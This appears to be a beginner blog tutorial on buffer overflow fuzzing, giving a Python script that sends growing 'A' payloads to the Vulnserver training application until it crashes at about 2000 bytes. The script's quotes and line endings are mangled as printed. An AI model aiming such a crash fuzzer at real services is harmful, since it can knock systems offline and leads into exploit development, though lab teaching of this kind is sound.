Buffer overflow Beginner To Advance Part 2

Buffer overflow Beginner To Advance part2 - Securium Solutions

Greeting Everyone! Today we will learn how to perform fuzzing as our previous blog we discussed Basic structure of buffer overflow today in this blog we will start from fuzzing with suitable example .

What is Fuzzing?

Fuzzing is automated script where it is send continuously bytes to vulnerable application to check application is vulnerable of buffer overflow or not.

Vulnserver is running on port number 9999

Python Code For Fuzzing :-

  • #!/usr/bin/python
  • import socket, time, sys
  • ip = “172.16.0.10”
  • port = 9999
  • timeout = 5
  • buffer = []
  • counter = 100
  • while len(buffer) < 30:
  • buffer.append(“A” * counter)
  • counter += 100
  • for string in buffer:
  • try:
  • s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  • s.settimeout(timeout)
  • connect = s.connect((ip, port))
  • s.recv(1024)
  • print(“Fuzzing with %s bytes” % len(string))
  • s.send(“OVERFLOW1 ” + string + “rn”)
  • s.recv(1024)
  • s.close()
  • except:
  • print(“Could not connect to ” + ip + “:” + str(port))
  • sys.exit(0)
  • time.sleep(1)

As Above we run the script and script started sending packet continuously towards vulnserver. Here we monitor script stopped on 2000 bytes because vulnserver stopped responding.

Below I attached both screenshot one of script response and second of vulnserver status.

image 27FUZZING
Buffer overflow Beginner To Advance Part 2 2

Now Another screen it paused as our Vulnerable software is running on Immunity Debugger ,

From Immunity Debugger

As above Example Scenario We discussed How fuzzing work How we can validate buffer size using fuzzing with Python script

In this Fuzzing section we learn how to write script and perform fuzzing on application to find the buffer overflow vulnerability.

Thanks For Reading……. See You In Another Blog!

Stick With Our Blog: Click Here

Author

Shubham Jaiswal

WEB VAPT (Intern)

Leave A Comment